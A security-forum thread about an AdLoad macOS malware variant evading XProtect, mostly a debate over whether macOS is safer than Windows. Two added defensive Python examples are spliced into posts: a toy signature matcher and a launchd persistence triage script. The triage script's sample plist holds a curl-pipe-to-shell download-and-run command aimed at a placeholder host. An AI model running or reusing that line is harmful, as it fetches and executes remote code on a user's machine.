New AdLoad malware variant slips through Apple's XProtect defenses

Discussion in 'all things Mac' started by guest, Aug 11, 2021.

Thread Status:
Not open for further replies.
  1. guest

    guest Guest

    New AdLoad malware variant slips through Apple's XProtect defenses
    August 11, 2021
    https://www.bleepingcomputer.com/ne...riant-slips-through-apples-xprotect-defenses/
    SentinelLabs: Massive New AdLoad Campaign Goes Entirely Undetected By Apple’s XProtect
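The SentinelLabs headline above turns on one mechanical point: XProtect is a signature scanner (it ships YARA rules in XProtect.yara inside XProtect.bundle), so a family that rebuilds its loader often produces "hundreds of unique samples" that share behaviour but not bytes. The toy matcher below is an added example written for this thread, not code from the forum, from Apple or from SentinelLabs. It implements the `??` wildcard and `[lo-hi]` jump subset of YARA hex strings; the four x86-64 fragments and both signatures are constructed here and stand in for a loader stub, not real malware bytes.

```python
"""Toy hex-signature matcher in the style of XProtect's YARA rules.

Added example for the thread above. XProtect really does ship YARA rules
(XProtect.yara in XProtect.bundle); the syntax subset, the byte fragments
and the two signatures here are constructed to show why narrow byte
signatures miss fresh builds of the same family.
"""
import re
from typing import Dict, List, Optional, Tuple, Union

# A token is a literal byte, None for a "??" wildcard, or (lo, hi) for a
# "[lo-hi]" jump of between lo and hi arbitrary bytes.
Token = Union[int, None, Tuple[int, int]]

_TOKEN_RE = re.compile(r"\?\?|\[(\d+)-(\d+)\]|([0-9A-Fa-f]{2})")


def parse_hex_pattern(pattern: str) -> List[Token]:
    """Parse a YARA-style hex string such as "48 8D ?? [2-4] C3"."""
    tokens: List[Token] = []
    pos = 0
    for m in _TOKEN_RE.finditer(pattern):
        if pattern[pos:m.start()].strip():
            raise ValueError(f"unexpected text in pattern near offset {pos}")
        pos = m.end()
        if m.group(0) == "??":
            tokens.append(None)
        elif m.group(1) is not None:
            lo, hi = int(m.group(1)), int(m.group(2))
            if lo > hi:
                raise ValueError(f"bad jump [{lo}-{hi}]")
            tokens.append((lo, hi))
        else:
            tokens.append(int(m.group(3), 16))
    if pattern[pos:].strip():
        raise ValueError("trailing garbage in pattern")
    return tokens


def _match_at(data: bytes, i: int, tokens: List[Token], t: int) -> bool:
    """Match tokens[t:] against data[i:], backtracking over jump lengths."""
    if t == len(tokens):
        return True
    tok = tokens[t]
    if isinstance(tok, tuple):
        lo, hi = tok
        return any(_match_at(data, i + n, tokens, t + 1)
                   for n in range(lo, hi + 1) if i + n <= len(data))
    if i >= len(data):
        return False
    if tok is not None and data[i] != tok:
        return False
    return _match_at(data, i + 1, tokens, t + 1)


def find_signature(data: bytes, pattern: str) -> Optional[int]:
    """Offset of the first match of pattern in data, or None if undetected."""
    tokens = parse_hex_pattern(pattern)
    for i in range(len(data) + 1):
        if _match_at(data, i, tokens, 0):
            return i
    return None


def scan(samples: Dict[str, bytes], signatures: Dict[str, str]) -> Dict[str, List[str]]:
    """Names of the signatures that hit each sample (empty list = undetected)."""
    return {name: [sig for sig, pat in signatures.items()
                   if find_signature(blob, pat) is not None]
            for name, blob in samples.items()}


# Constructed x86-64 fragments standing in for a loader stub
# (push rbp; mov rbp,rsp; sub rsp,N; lea rdi,[rip+disp]; call; add rsp,N; pop rbp; ret).
SAMPLES: Dict[str, bytes] = {
    "original":      bytes.fromhex("554889E5 4883EC20 488D3D10000000 E8EFBEADDE    4883C420 5DC3"),
    "nop_padded":    bytes.fromhex("554889E5 4883EC20 488D3D10000000 E8EFBEADDE 90 4883C420 5DC3"),
    "frame_0x28":    bytes.fromhex("554889E5 4883EC28 488D3D10000000 E8EFBEADDE    4883C428 5DC3"),
    "indirect_call": bytes.fromhex("554889E5 4883EC20 488D3D10000000 FF1500100000  4883C420 5DC3"),
}

SIGNATURES: Dict[str, str] = {
    # exact bytes of the first sample, only the relocated operands wildcarded
    "strict": "48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 20",
    # tolerates up to two padding bytes and any frame size, still needs a direct call
    "loose":  "48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? [0-2] 48 83 C4 ??",
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLES, SIGNATURES).items():
        print(f"{name:14s} -> {hits or 'UNDETECTED'}")
```

Running it shows the arms race in miniature: the strict rule catches only the build it was written from, the looser rule absorbs a NOP and a different stack frame, and a single change from a direct `call` to an indirect `call [rip+disp]` defeats both. A defender who only updates signatures is always one rebuild behind, which is why the article argues for behavioural controls on top of XProtect.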
     
  2. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Like I said, XProtect and Gatekeeper aren't nearly as good as Win Defender, from what I understood. So if you're serious about security, it's probably best to run a third party AV on the Mac, unless you are not that worried about malware of course.
     
  3. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    I understand that macOS is still way safer than Windows anyway.

    "The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices." op cit

    I'll translate that:

    "The fact that allegedly hundreds of unique samples of scary FUD have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the scary power of FUD to convince Mac users to spend their money on additional 3rd party security programs to make loads of money for those 3rd party distributors."

    I'm still not buying into the corporate FUD machine. :rolleyes:
     
  4. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    No, macOS is not a safer OS than Windows, it's just that there is less malware available for it, because it has a way smaller percentage when it comes to total users. If macOS was just as big as Windows, it would be more targeted. These types of articles simply remind people that they should still practice safe computing even on Mac computers. BTW, I have also never been infected by malware in 20+ years on Windows, with that I mean I have never lost any data or money.
     
  5. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    Yes it is. Unix is inherently safer and better defended as a system. Safer, not impenetrable. I'm not buying the safety in smaller numbers rhetoric that's regularly bandied about. It's not that there isn't some truth to it, it's just that the argument has been turned on its head by the FUD brigade.

    Apple have control over their own hardware in a way M$ doesn't. This also inevitably contributes to a safer system.

    The question you have to ask is why are the FUD brigade propagating this argument?

    The answer is fairly straightforward: FUD = money.

    The next question you have to ask is who benefits from this money?

    I have run Chrome OS, macOS and Ubuntu for years with nothing more than browser hardening.

    With a subtext. :eek:
     
  6. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    I'm afraid you are wrong, purely from a technical point of view, the macOS isn't safer than Windows. But it's true that most people on the macOS are probably downloading software from the Mac App Store, so this means they are less at risk of downloading malware. That's probably the key difference.

    This is exactly what M$ is trying to achieve with the Windows Store, but people are just too used to downloading software from all kinds of download sites or directly from the vendor. But once you get malware running on a Mac, it's just as dangerous as on Windows, they can perform exactly the same activities, think of info stealers and ransomware.
     
  7. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    I'm not wrong.

    https://blog.ipswitch.com/unix-has-always-been-more-secure-than-windows
     
  8. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,626
    Are Macs more secure than PCs? Not always. Here’s why
    https://www.pensar.co.uk/blog/are-macs-more-secure-than-pcs
     
  9. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Well, I guess we will have to agree to disagree, but just read the article that roger_m posted and here is another one that will hopefully make things much more clear.

    https://www.sentinelone.com/blog/which-is-more-secure-windows-linux-or-macos/

    Great article which explains things clearly. People who continue to say that Macs are more secure after reading this, just don't get it.
     
  10. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    It's definitely a 'grate' article lol. I'm still not buying the FUD. I just get that macOS is intrinsically more secure. I know it's difficult to de-brainwash yourself from the Windows mind-set. All I've ever needed on a Mac is browser hardening and common sense. There will always be the paranoid and the Mac haters with their own tendentious agendas and bigotries.

    Unix isn't invulnerable but by its very design it is safer than anything Mickey offers. As I wasn't born yesterday, or even in the early hours of this morning, I'm just not buying the FUD propaganda. As for 'truth' Kaspersky wouldn't know veracity if it jumped up and bit them in the dongle. I've told you before, this is all to do with spondoolies (£££$$$) and inevitably separating the gullible and the paranoid from them.

    It's a textbook example of how FUD works. Since Mickey has had to drastically improve its own bundled AV many security companies are now struggling economically. A direct consequence of this is a definite need to find new markets. Linux users as a whole don't tend to be taken in by the FUD and I've only ever spoken to one person online who uses an AV on Linux. Besides, I doubt Linux users would pay for third party security. Mac and Linux have the same BSD origin.

    So what's the logical market to target? Chrome OS, like all Linux, doesn't really need an AV and Chrome OS has its own in-built security. That leaves Apple. As Apple products aren't cheap it makes sense for 'security companies' to target a perceived wealthier market demographic. The best way to prepare that market is to use FUD propaganda. The Mac haters will go along with this on principle as it justifies their own bigotry. Whether the third party security solution is vendor or freeware there will be some pay off for the distributors as they will harvest something from your computer. People are wising-up to the 'security game'.

    I'm just not that gullible anymore. I've been AV-free for some years now.
     
    Last edited: Aug 15, 2021
  11. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,626
    @Daveski17 I really do not believe that macOS is more secure than Windows. In any case, Windows is more than secure enough for my needs and malware isn't something that I need to worry about, as for the most part, I never encounter any. While I do use antiviruses, I would have no problem using a Windows computer with no security software installed.
     
  12. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    It isn't an ontological subjectivity, macOS, like all Unix, is more secure by design. Belief has little to do with it.

    "This explains in far more detail than the rest of the article how UNIX/Linux is more secure than Windows.

    To understand the world of UNIX, you have to understand that software development has been split into different branches. These branches sometimes develop into forks. Before I continue, I need to clarify one common misunderstanding: Apple chose to build on BSD (BSD Overview, 2013), which is nothing more than a fork of the BSD branch. MacOS = UNIX.

    Project -> branch -> fork

    UNIX -> BSD -> MacOS

    UNIX -> Linux -> Red Hat, Ubuntu

    Now that we got that out of the way, UNIX-based operating systems have always been more secure than Windows. My reasoning is simple: Windows exposes too many vital areas to potential problems. The biggest problem, in my opinion, is that the RPC (Remote Procedure Call) service is linked to every vital Windows service. In layman's terms, the RPC allows remote control of your system; similar to if you have nothing but smart devices powering everything in your home from your doors & locks, all the way to the lights in your bedroom, the thermostat, and the alarm system. All a virus writer would have to do is hijack the RPC, and the virus writer has full control of the system. For the curious people, I included a full list of services (some of the services are particular to my PC, as every PC will have software that adds different background services).

    In contrast, UNIX takes a modular approach. Think of it like LEGO blocks; you can add or remove pieces as you like, and you have the freedom to even sabotage your own creation. Instead of integrating everything into one environment, you can independently add/remove/fix separate items. For example, if your network component doesn't work, then you can still run the operating system and independently fix the network component. Likewise, if you suddenly can't display your graphics; then you can go into the console (text interface) and determine if it's the software for the graphics card, or if it's your GUI (graphic user interface - the thing that allows you to move your mouse and click instead of type a command in a terminal or console).

    Additional note: Linux does have an RPC service, but it's only linked to the services that absolutely need it. In many cases, each program runs its own server as needed with its own username on the system. This is what makes UNIX/Linux far more secure than Windows.

    The BSD fork is different from the Linux fork in that its licensing doesn't require you to open source everything. That's why I suspect Apple chose the BSD format. It still has the same stability of the original OS, but the Linux community doesn't have the opportunity to rewrite it and distribute it legally."

    ~ op cit


    UNIX Has Always Been More Secure Than Windows, Robert Yeckley 2020
     
  13. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Look it's true that IT security companies are obviously trying to make money, but that doesn't mean that it's any less true what they are saying. Fact of the matter is that purely from a technical point of view, the macOS isn't more safe. Like some people say, you are entitled to your own opinion, but not to your own facts.

    It's a fact that protection systems in the macOS like XProtect and Gatekeeper can be bypassed, just like Windows Defender or any other AV can be bypassed. But first you need to encounter malware, and on the macOS it's less likely that you will. That doesn't mean it's more secure.

    BTW, here is a good example, remember the attack on Coinbase employees? Hackers were using zero-day bugs in Firefox to successfully plant malware on the macOS, see first link. And the other links are also quite interesting, it's about how protection systems in the macOS were bypassed.

    https://arstechnica.com/information...used-to-install-undetected-backdoors-on-macs/
    https://www.wired.com/story/macos-malware-shlayer-gatekeeper-notarization/
    https://www.wired.com/story/apple-approved-malware-macos-notarization-shlayer/
     
  14. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    No, macOS, like all Unix, is inherently more secure therefore safer to use, as Robert Yeckley expounds in the article I quoted from. Unix systems, including macOS, have always been technically more secure than Windows. These are actual facts and not subjective fantasy. It doesn't really matter what the haters and the FUD brigade state.

    Obviously no operating system is impenetrable and any OS can be compromised. Your argument is beginning to sound desperate and is losing its cogency. It's not just that there is less opportunity for Mac users to encounter malware but the system itself was never as vulnerable as Windows in the first place, primarily due to its modular design. Logically therefore Unix (macOS) is more secure than Windows ipso facto.

    All these prove is that any system can have vulnerabilities. This isn't actually a surprise to anyone, including macOS users like myself. It's not just that security companies are trying to make money, after all, that's their whole raison d'être. They've always been in the security business to make money. That's why businesses start. One of the reasons it was such a lucrative and necessary business in the first place was that Windows was the dominant OS in the market. Its excessive vulnerability to attack by malware compared to safer systems like Unix was realised from the outset. The inherent and copious security flaws in Windows have been known for many years and exploited by malware writers and security companies for their own respective gains.

    You have to look at the entire cultural milieu surrounding the recent need to target macOS users about malware awareness. As MS is losing market share gradually to Unix based systems (especially mobile devices) the need for security companies to diversify and adapt is paramount to their very survival. It's only natural and logical that they will look at other popular OS types to target. Android, Chrome OS and macOS are prime candidates for FUD and are actually an expanding market. However, most Linux distro users probably won't be convinced by the fear spread by security companies. So targeting the average Ubuntu user (also like myself) probably won't have much effect. Notwithstanding Linux is a small minority. At the end of the day, if macOS was used in the same percentage as Windows is now, it would still be an inherently safer system by virtue of its design. Safer, not impervious to malware. I've no doubt there would be more imperative for Apple to make its in-built defences more secure, but I do doubt there would even be a need for third party security anti-virus programs at all.

    The very reason that these companies exist was originally due to the weaknesses and vulnerabilities of Windows to malware in the first place. Have you ever wondered why MS originally bundled MSE with Windows? It was a very capable AV, although Mickey played this down. It changed everything, especially for third party security companies. MS bundled MSE as Windows has always been intrinsically vulnerable. Usually and logically the horse goes in front of the cart, not behind it. You can also lead a horse to water. Getting it to accept FUD is a different thing altogether.
     
    Last edited: Aug 17, 2021
  15. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Well, I can say the same thing about you. I have posted numerous articles that prove that macOS is not as secure as people may think, and you keep referring to the same article about Unix being more safe because of its modular design, something that most people don't care about, especially not the ones that get infected on their supposedly "super duper" secure macOS system.

    Do you really think those Coinbase employees that got targeted on macOS via a couple of zero days in Firefox, and possibly lost money and data, care about the modular design of Unix? You can call it FUD but at the end of the day it's a fact that Gatekeeper and XProtect couldn't protect against malware like AdLoad, Shlayer and NetWire.

    Heck, even Apple admits the problem with malware on the macOS is becoming bigger, but guess what, even the Apple App Store isn't foolproof, one of the top downloads was actually spyware that was able to bypass the macOS "app sandboxing" restrictions LOL. But anyway, it's clear that we have a different point of view.

    https://threatpost.com/apple-finally-boots-sneaky-adware-doctor-app-from-mac-app-store/137319/
    https://www.cnbc.com/2021/05/19/app...t-level-of-mac-malware-is-not-acceptable.html
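The post above names three families (AdLoad, Shlayer, NetWire) that got past Gatekeeper and XProtect, and the SentinelLabs quote earlier in the thread calls for "further endpoint security controls" on top of them. Because XProtect only matches file contents against signatures, the control a practitioner reaches for first is a look at where persistence actually lives on macOS: the launchd job plists in /Library/LaunchAgents, /Library/LaunchDaemons and ~/Library/LaunchAgents, which adware and backdoors commonly use to survive logout and reboot. The script below is an added example written for this thread, not code from the forum or from Apple. Its heuristics (trusted path prefixes, Apple-looking labels backed by non-Apple binaries, hidden path components, shell or script interpreters given an inline command) are this example's assumptions rather than any Apple rule, and the three sample plists are constructed, not taken from a real infection.

```python
"""Triage launchd jobs for persistence that a signature scanner would not flag.

Added example, not code from the forum thread or from Apple. The heuristics
and the three sample plists are constructed for this example; the launchd
directories are the standard ones macOS reads.
"""
import os
import plistlib
from pathlib import Path
from typing import Any, Dict, List

# Prefixes a persistent job is normally expected to run from (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")
# Only these should back a job whose Label claims to be Apple's (assumption).
APPLE_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
# Interpreters that turn a plist into an arbitrary-code launcher via "-c"/"-e".
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "ruby"}

LAUNCH_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]


def _program_of(job: Dict[str, Any]) -> str:
    """The executable launchd will run: Program wins over ProgramArguments[0]."""
    if job.get("Program"):
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_job(job: Dict[str, Any]) -> Dict[str, Any]:
    """Apply the heuristics to one parsed launchd job dictionary."""
    label = str(job.get("Label", ""))
    program = _program_of(job)
    args = [str(a) for a in job.get("ProgramArguments") or []]
    findings: List[str] = []
    if not program:
        findings.append("no_program")
    if program and not program.startswith(TRUSTED_PREFIXES):
        findings.append("untrusted_location")
    if any(part.startswith(".") for part in Path(program).parts[1:]):
        findings.append("hidden_path_component")
    if label.startswith("com.apple.") and not program.startswith(APPLE_PREFIXES):
        findings.append("apple_label_non_apple_binary")
    if Path(program).name in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        findings.append("interpreter_inline_command")
    return {
        "label": label,
        "program": program,
        # RunAtLoad / KeepAlive are what make the job come back after logout or reboot
        "persistent": bool(job.get("RunAtLoad")) or bool(job.get("KeepAlive")),
        "findings": findings,
    }


def triage_plist(raw: bytes) -> Dict[str, Any]:
    """Parse one plist (XML or binary) and triage it."""
    return triage_job(plistlib.loads(raw))


def audit_directories(dirs: List[str] = LAUNCH_DIRS) -> List[Dict[str, Any]]:
    """Triage every *.plist in the launchd directories; missing dirs are skipped."""
    results: List[Dict[str, Any]] = []
    for d in dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for p in sorted(base.glob("*.plist")):
            try:
                r = triage_plist(p.read_bytes())
            except Exception as exc:  # a plist launchd cannot parse is itself worth a look
                r = {"label": "", "program": "", "persistent": False,
                     "findings": [f"unparseable: {exc}"]}
            r["path"] = str(p)
            results.append(r)
    return results


# Constructed sample jobs (not taken from any real infection).
SAMPLE_PLISTS: Dict[str, bytes] = {
    "vendor_updater": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "RunAtLoad": True,
    }),
    "apple_impostor": plistlib.dumps({
        "Label": "com.apple.helper",
        "ProgramArguments": ["/Users/alice/Library/Application Support/.hidden/helper"],
        "RunAtLoad": True, "KeepAlive": True,
    }),
    "shell_stager": plistlib.dumps({
        "Label": "com.xyz.agent",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://updates.example.invalid/u | sh"],
        "RunAtLoad": True,
    }),
}

if __name__ == "__main__":
    for name, raw in SAMPLE_PLISTS.items():
        r = triage_plist(raw)
        print(f"{name:15s} {r['label']:22s} persistent={r['persistent']} {r['findings'] or 'clean'}")
    for r in audit_directories():  # empty on a non-macOS host
        print(r["path"], r["findings"] or "clean")
```

On a Mac, `audit_directories()` walks the real launchd directories; anywhere else it returns nothing and only the constructed samples are shown. The point of the heuristics is that none of them care what bytes the payload contains: a job that claims an Apple label but runs out of a hidden folder under a home directory, or that hands `/bin/sh -c` a download-and-run one-liner, is suspect no matter how many unique builds the family ships, which is exactly the gap a signature-only scanner leaves open.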
     
  16. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Yes exactly, at the end of the day it comes down to safe computing practices. I haven't even used an AV on Windows and didn't even patch it for 12 years. And then I'm talking about Windows XP which wasn't as secure as Win 8 and 10, and still no malware LOL. Yes I do install lots of security tools, first of all because it's a whole lot of fun but also because I'm not taking any chances, you never know when you might encounter malware.
     
  17. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    You have no proof of anything. I have never stated that macOS was invulnerable. I've been using Unix for years without an AV, I wouldn't do that with Windows. Why do you think this is? Perhaps the Coinbase employees should have used a safer browser than Firefox?

    You seem to be obsessed with proclaiming that macOS isn't as safe as Windows. This seems more like weird cognitive dissonance than anything in actual reality. The fact is macOS is safer by design than anything MS.

    Pretty soon I'm buying another Mac. I won't put an AV on it. Why? Because it is safer than Windows by design.
     
  18. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    I never said that you claimed that the macOS was invulnerable. My point is, that it's much more important to remind people of this fact, instead of dismissing this as FUD. I'm not sure what you mean with "no proof", but the links that I posted are all based on actual events. So even if by design macOS is more secure, it doesn't matter since just like on Windows, those security tools can be bypassed. And blaming Firefox is a bit too easy, I'm sure that if you look long enough you will also find holes in Safari.

    No, I never said that, where did you read this? I'm saying that all of the links that I posted prove that macOS isn't as safe as presumed. It's you that seem to be obsessed in saying that the macOS is way more secure than Windows because of its design.

    And don't forget that security in the Windows OS has been improved considerably in the last 10 years, think of PatchGuard, AppContainer, Windows Defender and MS Smartscreen. You can even configure Win 10 in a way that it will only download apps from the Windows Store.

    And browser exploits are mostly a thing of the past now that Chromium based browsers and Firefox have implemented sandboxing. Plus ad-blockers will block most malvertising attacks. In other words, it's just as easy to stay safe on Windows as it is on the macOS, even if the amount of malware that you may encounter is way bigger.
     
  19. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    Safari has always had known vulnerabilities. Although with recent 'walled garden' policies it may be safer it's also less customisable.

    [attachment: AdBlock Pro1.jpg]

    A good adblocker is always useful. Although you may have to pay for one.

    Isn't as safe as presumed? Presumed by whom? This is the very crux of the FUD propaganda. It doesn't change the fact that macOS is actually safer by design. It is 'way' more secure than Windows.

    Yes, security application programs, especially AV's, were actually created because of the original vulnerability of Windows compared to Unix. Windows needs the security implementation far more than Unix.

    Keep telling yourself that Windows is as safe as macOS and it might even become true. In a parallel universe! lol
     
  20. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    By most people? It might lead them to believe that macOS is immune to malware, a dangerous thing to believe. But anyway, like I said, let us agree to disagree. But I do have to say that I sometimes wonder why on earth operating systems like Windows have so many APIs that can be abused. Most of these APIs aren't even used by legitimate software, but make life for malware a lot easier.

    But I have been studying malware for the macOS, and guess what, they have got the exact same capabilities. Although macOS does apply sandboxing to apps, something that M$ also tried with AppContainer, but most apps don't make use of it, because they need to be redesigned. BTW, another interesting OS that applies sandboxing is the Qubes OS, it's considered to be the safest OS and is based on Linux.

    https://www.wired.com/2014/11/protection-from-hackers/
    https://en.wikipedia.org/wiki/Qubes_OS
     
  21. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    Apple themselves were probably partly responsible for creating some of the mythology. Not unlike Google when they advertise Chrome OS as being so safe it doesn't need an AV. Although I'm pretty sure it doesn't. But Windows was irresponsibly vulnerable from the outset. Unix wasn't, that's the difference and my whole point. I think if you've used MS for a length of time you develop a particular (and necessary) security mindset. After all, that's why security forums like this one exist in the first place. To be honest, after a while, I was more concerned that an AV would tank my computer with false positives than getting actual malware. Eventually I ditched Windows. I've been running Ubuntu for some years without an AV (with some browser hardening) so the transition to macOS with no AV was relatively normal. I think Windows did a lot to make computers what they are today, but there's been a price.

    I've read a bit about Qubes, but I doubt it will convince me to swap Ubuntu for it.
     
  22. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Well, that's actually how I ended up on this forum, because around 2004 browser exploits were becoming a big problem. And then I got hooked on computer security, it became a hobby. Eventually I stopped using AVs because they became bloated and privacy invasive and I switched to HIPS and anti-executable and of course I did scan files via VirusTotal. But the most important thing is to simply download files only from trusted sources, it's not like hackers can use magic to implant malware on your system, know what I mean?

    And the question is how it works in real life. Bromium (which was bought by HP) came up with micro virtualization, very secure but certain people said it was just too slow and probably it's overkill.
     
  23. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    On my old Belnea notebook with 1 GB of RAM I was a bit limited with AVs. I tried the Panda Cloud when it was first available. With the initial scan it showed false positives. Vista was a bloated OS and had many problems so this was just one problem out of many. It basically soured me to Mickey$oft. Although MSE was actually pretty decent. I admit Win 7 was a lot better but after a while I realised that the problem wasn't with AVs or security programs but with the operating system itself. Windows was never as good, as light as, or as safe as Unix. After Mickey seriously and purposely screwed the updating with Win 7 I realised I had two realistic options: Ubuntu and macOS.

    I honestly don't believe I need anything other than Ubuntu and browser hardening.
     
  24. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    18,178
    Location:
    The Netherlands
    Yes, I can understand that if you had a couple of bad experiences that you decided that you were done with Windows. But even though it's not perfect, I still think Windows is a pretty good OS. BTW, I do think that macOS overall has fewer attack vectors inside the OS, so if you look at it in this way, it's indeed safer.

    However, as said before it's not immune to threats, so if you can get malware up and running, you're still at risk from info-stealers and ransomware for example. That's basically what I mean when I say that macOS isn't more secure than Windows. To give an example, here is an article about code injection methods in the macOS. I couldn't download the report since they don't accept email addresses from Yahoo Mail and Gmail.

    https://www.deepinstinct.com/2019/04/29/remote-code-injections-in-mac-os/
     
  25. Daveski17

    Daveski17 Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    10,239
    Location:
    Lloegyr
    Win 7 wasn't bad, but it's the only MS OS I've ever liked (tolerated). I actually ran Unix before I ever used Windows and to be honest I always thought I was 'slumming' it with Windows for years. Like I've said before, it's not that macOS (or any Unix) isn't invulnerable, it's just that it's intrinsically safer. Obviously it will always be a case of de gustibus non est disputandum. But I vastly prefer Unix to Windows for a variety of reasons, security is only one reason (although a major one). Ubuntu is actually my favourite OS but macOS is a close second.
     